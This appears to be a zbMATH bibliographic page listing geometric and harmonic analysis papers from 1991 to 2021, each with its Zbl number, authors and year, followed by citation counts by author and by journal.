Franchi, Bruno; Serapioni, Raul; Serra Cassano, Francesco
2003
Almost periodic Jacobi matrices with homogeneous spectrum, infinite dimensional Jacobi inversion, and Hardy spaces of character-automorphic functions. Zbl 1041.47502
Sodin, Mikhail; Yuditskii, Peter
1997
On gradient Ricci solitons. Zbl 1275.53061
Munteanu, Ovidiu; Sesum, Natasa
2013
A unified characterization of reproducing systems generated by a finite family. II. Zbl 1039.42032
Hernández, Eugenio; Labate, Demetrio; Weiss, Guido
2002
Prescribing Gaussian curvatures on surfaces with conical singularities. Zbl 0739.58012
Chen, Wenxiong; Li, Congming
1991
Motion of level sets by mean curvature. III. Zbl 0768.53003
Evans, L. C.; Spruck, J.
1992
Mean curvature flow through singularities for surfaces of rotation. Zbl 0847.58072
Altschuler, Steven; Angenent, Sigurd B.; Giga, Yoshikazu
1995
Non-homogeneous $$Tb$$ theorem and random dyadic cubes on metric measure spaces. Zbl 1261.42017
Hytönen, Tuomas; Martikainen, Henri
2012
An approach to symmetric spaces of rank one via groups of Heisenberg type. Zbl 0966.53039
Cowling, Michael; Dooley, Anthony; Korányi, Adam; Ricci, Fulvio
1998
On the $$\bar{\partial}$$ equation in weighted $$L^2$$ norms in $$\mathbb{C}^1$$. Zbl 0737.35011
Christ, Michael
1991
On genericity for holomorphic curves in four-dimensional almost-complex manifolds. Zbl 0911.53014
Hofer, Helmut; Lizan, Véronique; Sikorav, Jean-Claude
1997
The density property for complex manifolds and geometric structures. Zbl 0994.32019
Varolin, Dror
2001
Elliptic equations and systems with subcritical and critical exponential growth without the Ambrosetti-Rabinowitz condition. Zbl 1305.35069
Lam, Nguyen; Lu, Guozhen
2014
Extrapolation of weighted norm inequalities for multivariable operators and applications. Zbl 1049.42007
Grafakos, Loukas; Martell, José María
2004
Weakly monotone functions. Zbl 0805.35013
Manfredi, Juan J.
1994
Intrinsic regular hypersurfaces in Heisenberg groups. Zbl 1085.49045
Ambrosio, Luigi; Serra Cassano, Francesco; Vittone, Davide
2006
The hyperbolic geometry of the symmetrized bidisc. Zbl 1055.32010
Agler, J.; Young, N. J.
2004
A sharp analog of Young’s inequality on $$S^N$$ and related entropy inequalities. Zbl 1056.43002
Carlen, E. A.; Lieb, E. H.; Loss, M.
2004
On some properties of the quaternionic functional calculus. Zbl 1166.47018
2009
Isometrically embedded polydisks in infinite dimensional Teichmüller spaces. Zbl 0963.32004
Earle, Clifford J.; Li, Zhong
1999
Partial regularity for a minimum problem with free boundary. Zbl 0960.49026
Weiss, Georg Sebastian
1999
Singular solutions of fractional order conformal Laplacians. Zbl 1255.53037
del Mar González, Maria; Mazzeo, Rafe; Sire, Yannick
2012
Band-limited localized Parseval frames and Besov spaces on compact homogeneous manifolds. Zbl 1216.43004
Geller, Daryl; Pesenson, Isaac Z.
2011
The X-ray transform for a generic family of curves and weights. Zbl 1148.53055
Frigyik, Bela; Stefanov, Plamen; Uhlmann, Gunther
2008
Solution of two problems on wavelets. Zbl 0843.42015
Auscher, Pascal
1995
Domains in $${\mathbb{C}}^{n+1}$$ with noncompact automorphism group. Zbl 0733.32014
Bedford, Eric; Pinchuk, Sergey
1991
The entropy formula for the linear heat equation. Zbl 1044.58030
Ni, Lei
2004
Pseudo-holomorphic maps and bubble trees. Zbl 0759.53023
Parker, Thomas H.; Wolfson, Jon G.
1993
A characterization of the higher dimensional groups associated with continuous wavelets. Zbl 1043.42032
Laugesen, R. S.; Weaver, N.; Weiss, G. L.; Wilson, E. N.
2002
Hardy spaces, regularized BMO spaces and the boundedness of Calderón-Zygmund operators on non-homogeneous spaces. Zbl 1267.42013
Bui, The Anh; Duong, Xuan Thinh
2013
Exposing points on the boundary of a strictly pseudoconvex or a locally convexifiable domain of finite 1-type. Zbl 1312.32006
Diederich, K.; Fornæss, J. E.; Wold, E. F.
2014
The fundamental solution on manifolds with time-dependent metrics. Zbl 1029.58018
Guenther, Christine M.
2002
Gromov hyperbolicity through decomposition of metric spaces. II. Zbl 1047.30028
Portilla, Ana; Rodríguez, José M.; Touris, Eva
2004
Toeplitz operators on symplectic manifolds. Zbl 1152.81030
Ma, Xiaonan; Marinescu, George
2008
Anisotropic Triebel-Lizorkin spaces with doubling measures. Zbl 1147.42006
Bownik, Marcin
2007
Geometric and transformational properties of Lipschitz domains, Semmes-Kenig-Toro domains, and other classes of finite perimeter domains. Zbl 1142.49021
Hofmann, Steve; Mitrea, Marius; Taylor, Michael
2007
Entropy and reduced distance for Ricci expanders. Zbl 1071.53040
Feldman, Michael; Ilmanen, Tom; Ni, Lei
2005
The second main theorem for moving targets. Zbl 0732.30025
Ru, Min; Stoll, Wilhelm
1991
A Liouville-type theorem for smooth metric measure spaces. Zbl 1263.53027
Brighton, Kevin
2013
Quasiregular maps on Carnot groups. Zbl 0905.30018
Heinonen, Juha; Holopainen, Ilkka
1997
Optimal maps and exponentiation on finite-dimensional spaces with Ricci curvature bounded from below. Zbl 1361.53036
Gigli, Nicola; Rajala, Tapio; Sturm, Karl-Theodor
2016
Jump problem and removable singularities for monogenic functions. Zbl 1211.30056
Abreu-Blaya, Ricardo; Bory-Reyes, Juan; Peña-Peña, Dixan
2007
Motion of level sets by mean curvature. IV. Zbl 0829.53040
Evans, Lawrence C.; Spruck, Joel
1995
Interpolation by holomorphic automorphisms and embeddings in $${\mathbb{C}}^n$$. Zbl 0963.32006
Forstneric, Franc
1999
Integral operators, embedding theorems and a Littlewood-Paley formula on weighted Fock spaces. Zbl 1405.30056
Constantin, Olivia; Peláez, José Ángel
2016
Zeta and eta functions for Atiyah-Patodi-Singer operators. Zbl 0858.58050
Grubb, Gerd; Seeley, Robert T.
1996
The Whitney problem of existence of a linear extension operator. Zbl 0937.58007
Brudnyi, Yuri; Shvartsman, Pavel
1997
Szegö and Bergman projections on non-smooth planar domains. Zbl 1046.30023
Lanzani, Loredana; Stein, Elias M.
2004
On the Bakry-Émery condition, the gradient estimates and the local-to-global property of $$\mathrm{RCD}^*(K,N)$$ metric measure spaces. Zbl 1335.35088
Ambrosio, Luigi; Mondino, Andrea; Savaré, Giuseppe
2016
Pre-Schwarzian and Schwarzian derivatives of harmonic mappings. Zbl 1308.31001
Hernández, Rodrigo; Martín, María J.
2015
Some isoperimetric problems in planes with density. Zbl 1193.49050
Cañete, Antonio; Miranda, Michele jun.; Vittone, Davide
2010
Kähler-Ricci soliton typed equations on compact complex manifolds with $$c_1(M)>0$$. Zbl 1036.53054
Zhu, Xiaohua
2000
Reflection ideals and mappings between generic submanifolds in complex space. Zbl 1039.32021
Baouendi, M. S.; Mir, Nordine; Rothschild, Linda Preiss
2002
Quaternionic Monge-Ampère equations. Zbl 1058.32028
Alesker, Semyon
2003
Musielak-Orlicz-Hardy spaces associated with operators and their applications. Zbl 1302.42033
Yang, Dachun; Yang, Sibei
2014
Explicit formulas and global uniqueness for phaseless inverse scattering in multidimensions. Zbl 1338.81361
Novikov, R. G.
2016
Schwarz lemma at the boundary of the unit ball in $$\mathbb C^n$$ and its applications. Zbl 1320.32020
Liu, Taishun; Wang, Jianfei; Tang, Xiaomin
2015
The initial value problem for cohomogeneity one Einstein metrics. Zbl 0992.53033
Eschenburg, J.-H.; Wang, McKenzie Y.
2000
Regular functions of several quaternionic variables and the Cauchy-Fueter complex. Zbl 0966.35088
Adams, W. W.; Berenstein, C. A.; Loustaunau, P.; Sabadini, I.; Struppa, D. C.
1999
Wavelet characterization of weighted spaces. Zbl 0995.42016
García-Cuerva, J.; Martell, J. M.
2001
Generalized low pass filters and MRA frame wavelets. Zbl 0985.42020
Paluszyński, Maciej; Šikić, Hrvoje; Weiss, Guido; Xiao, Shaoliang
2001
Sharp Moser-Trudinger inequalities on hyperbolic spaces with exact growth condition. Zbl 1356.46031
Lu, Guozhen; Tang, Hanli
2016
The critical temperature for the BCS equation at weak coupling. Zbl 1137.82025
Frank, Rupert L.; Hainzl, Christian; Naboko, Serguei; Seiringer, Robert
2007
BMO solvability and the $$A_{\infty}$$ condition for elliptic operators. Zbl 1215.42029
Dindos, Martin; Kenig, Carlos; Pipher, Jill
2011
On the stability of the behavior of random walks on groups. Zbl 0985.60043
Pittet, Ch.; Saloff-Coste, L.
2000
$$L^2$$-harmonic 1-forms on submanifolds with finite total curvature. Zbl 1308.53056
Cavalcante, Marcos Petrúcio; Mirandola, Heudson; Vitório, Feliciano
2014
Dynamics of rational surface automorphisms: linear fractional recurrences. Zbl 1185.37128
Bedford, Eric; Kim, Kyounghee
2009
Recent work on sharp estimates in second-order elliptic unique continuation problems. Zbl 0787.35017
Wolff, Thomas H.
1993
Locally conformally flat Lorentzian gradient Ricci solitons. Zbl 1285.53059
Brozos-Vázquez, M.; García-Río, E.; Gavino-Fernández, S.
2013
Plurisubharmonic functions on hypercomplex manifolds and HKT-geometry. Zbl 1106.32023
Alesker, Semyon; Verbitsky, Misha
2006
Pointwise estimates for the Bergman kernel of the weighted Fock space. Zbl 1183.30058
Marzo, Jordi; Ortega-Cerdà, Joaquim
2009
Classes of singular integral operators along variable lines. Zbl 0964.42003
Carbery, Anthony; Seeger, Andreas; Wainger, Stephen; Wright, James
1999
A characterization of wavelets on general lattices. Zbl 1057.42025
Calogero, A.
2000
Hankel operators on Fock spaces and related Bergman kernel estimates. Zbl 1275.47063
Seip, Kristian; Youssfi, El Hassan
2013
Effective $$L_p$$ pinching for the concircular curvature. Zbl 0902.53031
Hebey, Emmanuel; Vaugon, Michel
1996
Differentiability of intrinsic Lipschitz functions within Heisenberg groups. Zbl 1234.22002
Franchi, Bruno; Serapioni, Raul; Serra Cassano, Francesco
2011
Sobolev inequalities for differential forms and $$L_{q,p}$$-cohomology. Zbl 1105.58008
2006
Mass transport and variants of the logarithmic Sobolev inequality. Zbl 1170.46031
Barthe, Franck; Kolesnikov, Alexander V.
2008
On the degree growth of birational mappings in higher dimension. Zbl 1067.37054
Bedford, Eric; Kim, Kyounghee
2004
On four-dimensional anti-self-dual gradient Ricci solitons. Zbl 1322.53041
Chen, Xiuxiong; Wang, Yuanqi
2015
A Hardy space for Fourier integral operators. Zbl 1031.42020
Smith, Hart F.
1998
Stable solutions of elliptic equations on Riemannian manifolds. Zbl 1273.53029
Farina, Alberto; Sire, Yannick; Valdinoci, Enrico
2013
A Schwarz lemma for a domain related to $$\mu$$-synthesis. Zbl 1149.30020
Abouhajar, A. A.; White, M. C.; Young, N. J.
2007
Density of weighted wavelet frames. Zbl 1029.42031
Heil, Christopher; Kutyniok, Gitta
2003
Atomic and Littlewood-Paley characterizations of anisotropic mixed-norm Hardy spaces and their applications. Zbl 1420.42018
Huang, Long; Liu, Jun; Yang, Dachun; Yuan, Wen
2019
Rotationally invariant hypersurfaces with constant mean curvature in the Heisenberg group $$\mathbb H^n$$. Zbl 1129.53041
Ritoré, Manuel; Rosales, César
2006
An explicit computation of the Bergman kernel function. Zbl 0794.32021
D’Angelo, John P.
1994
Area minimizing sets subject to a volume constraint in a convex set. Zbl 0940.49025
Stredulinsky, Edward; Ziemer, William P.
1997
Approximation by spherical waves in $$L^p$$-spaces. Zbl 0898.44003
Agranovsky, Mark; Berenstein, Carlos; Kuchment, Peter
1996
On the number of singularities for the obstacle problem in two dimensions. Zbl 1041.35093
Monneau, R.
2003
Poincaré-type inequalities and reconstruction of Paley-Wiener functions on manifolds. Zbl 1080.42024
Pesenson, Isaac
2004
The Bergman projection as a singular integral operator. Zbl 0804.32015
McNeal, Jeffery D.
1994
Positivity for a strongly coupled elliptic system by Green function estimates. Zbl 0792.35048
Sweers, Guido
1994
Balls have the worst best Sobolev inequalities. Zbl 1086.46021
Maggi, Francesco; Villani, Cédric
2005
Boundedness of differential transforms for one-sided fractional Poisson-type operator sequence. Zbl 1460.42013
Chao, Zhang; Ma, Tao; Torrea, José L.
2021
Quantitative weighted estimates for Rubio de Francia’s Littlewood-Paley square function. Zbl 07327664
Garg, Rahul; Roncal, Luz; Shrivastava, Saurabh
2021
Infinite-dimensional Carnot groups and Gâteaux differentiability. Zbl 07328181
Le Donne, Enrico; Li, Sean; Moisala, Terhi
2021
Families of exposing maps in strictly pseudoconvex domains. Zbl 1460.32068
2021
Geometric pluripotential theory on Sasaki manifolds. Zbl 1465.53063
He, Weiyong; Li, Jun
2021
Optimal extensions of conformal mappings from the unit disk to cardioid-type domains. Zbl 1462.30017
Xu, Haiqing
2021
Delta invariants of singular del Pezzo surfaces. Zbl 1462.14039
Cheltsov, Ivan; Park, Jihun; Shramov, Constantin
2021
Stability of ALE Ricci-flat manifolds under Ricci flow. Zbl 07328222
Deruelle, Alix; Kröncke, Klaus
2021
The light ray transform in stationary and static Lorentzian geometries. Zbl 07343473
Feizmohammadi, Ali; Ilmavirta, Joonas; Oksanen, Lauri
2021
Volume estimates and classification theorem for constant weighted mean curvature hypersurfaces. Zbl 07343477
Ancari, Saul; Miranda, Igor
2021
Index of equivariant Callias-type operators and invariant metrics of positive scalar curvature. Zbl 07327637
Guo, Hao
2021
A characterization of homogeneous holomorphic two-spheres in $$Q_n$$. Zbl 1462.53056
Fei, Jie; Wang, Jun
2021
The Fourier transform on harmonic manifolds of purely exponential volume growth. Zbl 1465.53060
Biswas, Kingshook; Knieper, Gerhard; Peyerimhoff, Norbert
2021
Connected sum of CR manifolds with positive CR Yamabe constant. Zbl 1460.32078
Cheng, Jih-Hsin; Chiu, Hung-Lin; Ho, Pak Tung
2021
Long time existence for the bosonic membrane in the light cone gauge. Zbl 1461.35150
Yan, Weiping; Zhang, Binlin
2021
Maximal factorization of operators acting in Köthe-Bochner spaces. Zbl 07327658
Calabuig, J. M.; Fernández-Unzueta, M.; Galaz-Fontes, F.; Sánchez-Pérez, E. A.
2021
Weak Hardy-type spaces associated with ball quasi-Banach function spaces. II: Littlewood-Paley characterizations and real interpolation. Zbl 1460.42033
Wang, Songbai; Yang, Dachun; Yuan, Wen; Zhang, Yangyang
2021
Atomic decomposition and Carleson measures for weighted mixed norm spaces. Zbl 07327663
Peláez, José Ángel; Rättyä, Jouni; Sierra, Kian
2021
Improved bounds for Hermite-Hadamard inequalities in higher dimensions. Zbl 1462.26022
Beck, Thomas; Brandolini, Barbara; Burdzy, Krzysztof; Henrot, Antoine; Langford, Jeffrey J.; Larson, Simon; Smits, Robert; Steinerberger, Stefan
2021
A multifractal formalism for Hewitt-Stromberg measures. Zbl 1462.28003
Attia, Najmeddine; Selmi, Bilel
2021
Killing forms on 2-step nilmanifolds. Zbl 07327669
del Barco, Viviana; Moroianu, Andrei
2021
Multipeak solutions for the Yamabe equation. Zbl 1460.35144
Rey, Carolina A.; Ruiz, Juan Miguel
2021
Self-adjoint local boundary problems on compact surfaces. I: Spectral flow. Zbl 1460.35125
Prokhorova, Marina
2021
Bochner-Simons formulas and the rigidity of biharmonic submanifolds. Zbl 1467.53065
Fetcu, Dorel; Loubeau, Eric; Oniciuc, Cezar
2021
The $$\bar{\partial}$$-equation, duality, and holomorphic forms on a reduced complex space. Zbl 07328182
Samuelsson Kalm, Håkan
2021
A gradient flow of isometric $$\text{G}_2$$-structures. Zbl 07328184
Dwivedi, Shubham; Gianniotis, Panagiotis; Karigiannis, Spiro
2021
Multipoint formulas for phase recovering from phaseless scattering data. Zbl 07328186
Novikov, R. G.
2021
Short-time heat content asymptotics via the wave and eikonal equations. Zbl 1461.53027
Schilling, Nathanael
2021
Sharp Cheeger-Buser type inequalities in $$\mathsf{RCD}(K,\infty)$$ spaces. Zbl 07328207
De Ponti, Nicolò; Mondino, Andrea
2021
Hardy-type inequalities for the Carnot-Carathéodory distance in the Heisenberg group. Zbl 07328209
Franceschi, Valentina; Prandi, Dario
2021
Classic and exotic Besov spaces induced by good grids. Zbl 07328210
Smania, Daniel
2021
Higher Lelong numbers and convex geometry. Zbl 1460.32073
Kim, Dano; Rashkovskii, Alexander
2021
A hypersurface containing the support of a Radon transform must be an ellipsoid. I: The symmetric case. Zbl 07328219
Boman, Jan
2021
On the composition of rough singular integral operators. Zbl 1460.42017
Hu, Guoen; Lai, Xudong; Xue, Qingying
2021
Quantisation of extremal Kähler metrics. Zbl 1460.32048
Hashimoto, Yoshinori
2021
Hyperbolic metrics on surfaces with boundary. Zbl 1462.30081
Rupflin, Melanie
2021
Asymptotic behaviours in fractional Orlicz-Sobolev spaces on Carnot groups. Zbl 07328234
Capolli, M.; Maione, A.; Salort, A. M.; Vecchi, E.
2021
Singular doubly nonlocal elliptic problems with Choquard type critical growth nonlinearities. Zbl 07343416
Giacomoni, Jacques; Goel, Divya; Sreenadh, K.
2021
Stable components in the parameter plane of transcendental functions of finite type. Zbl 1466.37039
Fagella, Núria; Keen, Linda
2021
On asymptotically sharp bi-Lipschitz inequalities of quasiconformal mappings satisfying inhomogeneous polyharmonic equations. Zbl 1462.30043
Chen, Shaolin; Kalaj, David
2021
Rigidity of minimal submanifolds in space forms. Zbl 1466.53069
Chen, Hang; Wei, Guofang
2021
Compactness and finiteness theorems for rotationally symmetric self shrinkers. Zbl 1467.53103
Mramor, Alexander
2021
Bounded geometry and $$p$$-harmonic functions under uniformization and hyperbolization. Zbl 1466.53048
Björn, Anders; Björn, Jana; Shanmugalingam, Nageswari
2021
On generalizations of Fatou’s theorem in $$L^p$$ for convolution integrals with general kernels. Zbl 1462.42032
Safaryan, M. H.
2021
Ricci de Turck flow on singular manifolds. Zbl 07343465
Vertman, Boris
2021
The area preserving Willmore flow and local maximizers of the Hawking mass in asymptotically Schwarzschild manifolds. Zbl 07343467
Koerber, Thomas
2021
Isoperimetric inequalities in Riemann surfaces and graphs. Zbl 07343471
Martínez-Pérez, Álvaro; Rodríguez, José M.
2021
Maximum principles for $$k$$-Hessian equations with lower order terms on unbounded domains. Zbl 1462.35109
Bhattacharya, Tilak; Mohammed, Ahmed
2021
Sharp reverse Hölder inequality for $$C_p$$ weights and applications. Zbl 1462.42028
Canto, Javier
2021
Stability of the spacetime positive mass theorem in spherical symmetry. Zbl 1466.83022
Bryden, Edward; Khuri, Marcus; Sormani, Christina
2021
Conformal metrics with prescribed fractional scalar curvature on conformal infinities with positive fractional Yamabe constants. Zbl 07343494
Kim, Seunghyeok
2021
Splitting lemma for biholomorphic mappings with smooth dependence on parameters. Zbl 07379186
2021
The Haar system in Triebel-Lizorkin spaces: endpoint results. Zbl 07388953
Garrigós, Gustavo; Seeger, Andreas; Ullrich, Tino
2021
On the regularity of minima of non-autonomous functionals. Zbl 1437.35292
De Filippis, Cristiana; Mingione, Giuseppe
2020
Manifold constrained non-uniformly elliptic problems. Zbl 1437.49008
De Filippis, Cristiana; Mingione, Giuseppe
2020
Smoothness in the $$L_p$$ Minkowski problem for $$p<1$$. Zbl 1445.52005
Bianchi, Gabriele; Böröczky, Károly J.; Colesanti, Andrea
2020
Berezin-Toeplitz quantization for eigenstates of the Bochner Laplacian on symplectic manifolds. Zbl 1442.53061
Ioos, Louis; Lu, Wen; Ma, Xiaonan; Marinescu, George
2020
The Hermite-Hadamard inequality in higher dimensions. Zbl 1436.26025
Steinerberger, Stefan
2020
Some remarks on the pointwise sparse domination. Zbl 1434.42020
Lerner, Andrei K.; Ombrosi, Sheldy
2020
Explicit absolute parallelism for 2-nondegenerate real hypersurfaces $$M^5 \subset \mathbb{C}^3$$ of constant Levi rank 1. Zbl 1452.32044
Merker, Joël; Pocchiola, Samuel
2020
Mean curvature flow solitons in the presence of conformal vector fields. Zbl 1436.53066
Alías, Luis J.; de Lira, Jorge H.; Rigoli, Marco
2020
Morse-Novikov cohomology on complex manifolds. Zbl 1436.32032
Meng, Lingxu
2020
Gradient-type systems on unbounded domains of the Heisenberg group. Zbl 1442.35491
Molica Bisci, Giovanni; Repovš, Dušan
2020
Perelman’s functionals on cones. Construction of type III Ricci flows coming out of cones. Zbl 1435.53069
Ozuch, Tristan
2020
Contracting convex hypersurfaces in space form by non-homogeneous curvature function. Zbl 1444.53057
Li, Guanghan; Lv, Yusha
2020
Sharp weighted estimates for square functions associated to operators on spaces of homogeneous type. Zbl 1434.42012
Bui, The Anh; Duong, Xuan Thinh
2020
Self-contracted curves in CAT(0)-spaces and their rectifiability. Zbl 1434.52012
Ohta, Shin-Ichi
2020
On defining functions and cores for unbounded domains. II. Zbl 1462.32038
Harz, Tobias; Shcherbina, Nikolay; Tomassini, Giuseppe
2020
Existence results for minimizers of parametric elliptic functionals. Zbl 1436.49055
De Philippis, Guido; De Rosa, Antonio; Ghiraldin, Francesco
2020
One-dimensional symmetry for the solutions of a three-dimensional water wave problem. Zbl 1437.35173
Cinti, Eleonora; Miraglio, Pietro; Valdinoci, Enrico
2020
Existence problems on Heisenberg groups involving Hardy and critical terms. Zbl 07187376
Bordoni, Sara; Filippucci, Roberta; Pucci, Patrizia
2020
A Hardy-Littlewood maximal operator for the generalized Fourier transform on $$\mathbb{R}$$. Zbl 1436.42027
Ben Saïd, Salem; Deleaval, Luc
2020
A characterization of harmonic $$L^r$$-vector fields in two-dimensional exterior domains. Zbl 1464.35102
Hieber, Matthias; Kozono, Hideo; Seyfert, Anton; Shimizu, Senjo; Yanagisawa, Taku
2020
Cao, Huai-Dong; Cui, Xin
2020
On Lipschitz rigidity of complex analytic sets. Zbl 1448.14002
Fernandes, Alexandre; Sampaio, J. Edson
2020
Asymptotic convergence for a class of fully nonlinear curvature flows. Zbl 1434.53096
Li, Qi-Rui; Sheng, Weimin; Wang, Xu-Jia
2020
Maxima of curvature functionals and the prescribed Ricci curvature problem on homogeneous spaces. Zbl 1436.53033
Pulemotov, Artem
2020
Geometric characterization of Lyapunov exponents for Riemann surface laminations. Zbl 1450.37031
Nguyên, Viêt-Anh
2020
Regularity of solutions to the quaternionic Monge-Ampère equation. Zbl 1446.32023
Kołodziej, Sławomir; Sroka, Marcin
2020
Bloom type upper bounds in the product BMO setting. Zbl 1440.42063
Li, Kangwei; Martikainen, Henri; Vuorinen, Emil
2020
The Gauss-Bonnet theorem for coherent tangent bundles over surfaces with boundary and its applications. Zbl 1457.57040
Domitrz, Wojciech; Zwierzyński, Michał
2020
Local Hardy spaces with variable exponents associated with non-negative self-adjoint operators satisfying Gaussian estimates. Zbl 1442.42052
Almeida, Víctor; Betancor, Jorge J.; Dalmasso, Estefanía; Rodríguez-Mesa, Lourdes
2020
On the spectrum of differential operators under Riemannian coverings. Zbl 1447.58010
Polymerakis, Panagiotis
2020
On the squeezing function and Fridman invariants. Zbl 1436.32048
Nikolov, Nikolai; Verma, Kaushal
2020
Generalizations of the higher dimensional Suita conjecture and its relation with a problem of Wiegerinck. Zbl 07187353
Błocki, Zbigniew; Zwonek, Włodzimierz
2020
Sobolev mapping of some holomorphic projections. Zbl 1446.32005
Edholm, L. D.; McNeal, J. D.
2020
Pluricomplex Green functions on manifolds. Zbl 1436.32108
Poletsky, Evgeny A.
2020
On attractors of generalized semiflows with impulses. Zbl 1440.37036
de Mello Bonotto, Everaldo; Kalita, Piotr
2020
A weak reverse Hölder inequality for caloric measure. Zbl 1436.42028
Genschaw, Alyssa; Hofmann, Steve
2020
Quasiregular families bounded in $$L^p$$ and elliptic estimates. Zbl 1436.30014
Hinkkanen, Aimo; Martin, Gaven
2020
Infinite-time singularity type of the Kähler-Ricci flow. Zbl 1436.53076
Zhang, Yashan
2020
Prescribing capacitary curvature measures on planar convex domains. Zbl 1445.52001
Xiao, Jie
2020
The Orlicz Brunn-Minkowski inequality for the projection body. Zbl 1436.52008
Zou, Du; Xiong, Ge
2020
Non-local Gehring lemmas in spaces of homogeneous type and applications. Zbl 1462.30121
Auscher, Pascal; Bortz, Simon; Egert, Moritz; Saari, Olli
2020
Hermitian curvature flow on compact homogeneous spaces. Zbl 07327626
Panelli, Francesco; Podestà, Fabio
2020
The second inner variation of energy and the Morse index of limit interfaces. Zbl 1443.53022
Gaspar, Pedro
2020
The Kobayashi pseudometric for the Fock-Bargmann-Hartogs domain and its application. Zbl 1439.32027
Bi, Enchao; Su, Guicong; Tu, Zhenhan
2020
Tangent Lie algebra of a diffeomorphism group and application to holonomy theory. Zbl 1433.22010
Hubicska, Balázs; Muzsnay, Zoltán
2020
Einstein four-manifolds with sectional curvature bounded from above. Zbl 1443.53026
Zhang, Zhuhong
2020
$$H^p$$ boundedness of multilinear spectral multipliers on stratified groups. Zbl 1431.43007
Fang, Jingxuan; Zhao, Jiman
2020
...and 1281 more Documents
#### Cited by 7,121 Authors
87 Yang, Dachun 48 Colombo, Fabrizio 43 Sabadini, Irene 42 Lu, Guozhen 33 Rodríguez García, José Manuel 31 Forstnerič, Franc 29 Isaev, Alexander 26 Duong, Xuan Thinh 23 Bownik, Marcin 23 Chang, Der-Chen E. 23 Gilkey, Peter B. 23 Li, Ji 23 Yuan, Wen 22 Hofmann, Steve 22 Sun, Wenchang 21 García-Río, Eduardo 21 Krantz, Steven George 21 Wold, Erlend Fornæss 20 Angella, Daniele 20 Fornæss, John Erik 20 Markina, Irina 20 Uhlmann, Gunther Alberto 19 Yang, Sibei 18 Kutzschebauch, Frank 18 Magnani, Valentino 18 Mengestie, Tesfa Y. 18 Pinamonti, Andrea 18 Valdinoci, Enrico 17 Auscher, Pascal 17 Cianchi, Andrea 17 Fefferman, Charles Louis 17 Guedj, Vincent 17 Jiang, Renjin 17 Li, Kangwei 17 Martell, José María (Chema) 17 Mayboroda, Svitlana 17 Novaga, Matteo 17 Pesenson, Isaac Zalmanovich 17 Raich, Andrew S. 17 Yuditskii, Peter Meerovich 16 Alpay, Daniel Aron 16 Berman, Robert J. 16 Bory Reyes, Juan 16 Boyer, Charles P. 16 D’Angelo, John P. 16 Garofalo, Nicola 16 Jost, Jürgen 16 Liu, Taishun 16 Morgan, Frank 16 Shimomura, Tetsu 16 Sibony, Nessim 16 Song, Liang 16 Struppa, Daniele Carlo 16 The Anh Bui 16 Tu, Zhenhan 16 Wang, Wei 16 Wu, Jiayong 16 Yan, Lixin 16 Zaitsev, Dmitri 15 De Lellis, Camillo 15 Hamada, Hidetaka 15 Han, Yongsheng 15 Huang, Guangyue 15 Lebl, Jiří 15 Malchiodi, Andrea 15 Mourgoglou, Mihalis 15 Pratelli, Aldo 15 Sire, Yannick 15 Tien Cuong Dinh 15 Tomassini, Adriano 15 Zwonek, Włodzimierz 14 Bartolucci, Daniele 14 Cruz-Uribe, David Vincente 14 Gaussier, Hervé 14 Hainzl, Christian 14 Huang, Xiaojun 14 Koskela, Pekka 14 Lamel, Bernhard 14 Le Donne, Enrico 14 Mitrea, Marius 14 Moen, Kabe 14 Rosales, César 14 Simon, Barry 14 Streets, Jeffrey D. 14 Székelyhidi, László jun. 14 Tyson, Jeremy T. 14 Vallarino, Maria 14 Wei, Juncheng 13 Abreu-Blaya, Ricardo 13 Alarcón, Antonio 13 Balogh, Zoltán M. 
13 Bernicot, Frédéric 13 Cheltsov, Ivan Anatol’evich 13 Di Nezza, Eleonora 13 Franchi, Bruno 13 Giga, Yoshikazu 13 Kohr, Gabriela 13 Labate, Demetrio 13 Mondino, Andrea 13 Nikolov, Nikolai Marinov ...and 7,021 more Authors
#### Cited in 515 Journals
710 The Journal of Geometric Analysis 330 Journal of Mathematical Analysis and Applications 290 Proceedings of the American Mathematical Society 257 Calculus of Variations and Partial Differential Equations 256 Transactions of the American Mathematical Society 248 Journal of Functional Analysis 244 Advances in Mathematics 194 Mathematische Zeitschrift 188 Mathematische Annalen 153 Nonlinear Analysis. Theory, Methods & Applications. Series A: Theory and Methods 129 Annals of Global Analysis and Geometry 115 Journal of Geometry and Physics 115 The Journal of Fourier Analysis and Applications 107 Differential Geometry and its Applications 105 International Journal of Mathematics 103 Journal of Differential Equations 100 Annali di Matematica Pura ed Applicata. Serie Quarta 95 Duke Mathematical Journal 89 Geometriae Dedicata 85 Journal de Mathématiques Pures et Appliquées. Neuvième Série 82 Potential Analysis 81 Revista Matemática Iberoamericana 79 Annales de l’Institut Fourier 76 Archive for Rational Mechanics and Analysis 75 Communications in Mathematical Physics 72 Applied and Computational Harmonic Analysis 68 Journal d’Analyse Mathématique 68 Inventiones Mathematicae 68 Communications in Partial Differential Equations 68 Science China. Mathematics 66 Acta Mathematica Sinica. English Series 65 Comptes Rendus. Mathématique. Académie des Sciences, Paris 63 Complex Variables and Elliptic Equations 58 Manuscripta Mathematica 54 Results in Mathematics 53 Journal of Mathematical Physics 51 Archiv der Mathematik 49 Geometric and Functional Analysis. GAFA 49 Complex Analysis and Operator Theory 47 Journal für die Reine und Angewandte Mathematik 46 Mathematische Nachrichten 45 Annales de la Faculté des Sciences de Toulouse. Mathématiques. Série VI 42 Annales de l’Institut Henri Poincaré. Analyse Non Linéaire
42 Geometry & Topology 41 SIAM Journal on Mathematical Analysis 40 Communications in Contemporary Mathematics 39 Journal of the European Mathematical Society (JEMS) 39 Mediterranean Journal of Mathematics 38 Integral Equations and Operator Theory 38 Bulletin des Sciences Mathématiques 37 European Series in Applied and Industrial Mathematics (ESAIM): Control, Optimization and Calculus of Variations 35 Israel Journal of Mathematics 35 Communications on Pure and Applied Analysis 34 Michigan Mathematical Journal 34 Monatshefte für Mathematik 32 Memoirs of the American Mathematical Society 30 Communications on Pure and Applied Mathematics 30 Pacific Journal of Mathematics 30 Chinese Annals of Mathematics. Series B 30 International Journal of Wavelets, Multiresolution and Information Processing 30 Analysis and Mathematical Physics 30 Analysis and Geometry in Metric Spaces 29 Tohoku Mathematical Journal. Second Series 29 Discrete and Continuous Dynamical Systems 29 Journal of Function Spaces 28 Journal of the American Mathematical Society 28 Forum Mathematicum 26 Illinois Journal of Mathematics 26 Annales Academiae Scientiarum Fennicae. Mathematica 26 Annals of Mathematics. Second Series 25 Applicable Analysis 25 Journal of Approximation Theory 25 Bulletin of the American Mathematical Society. New Series
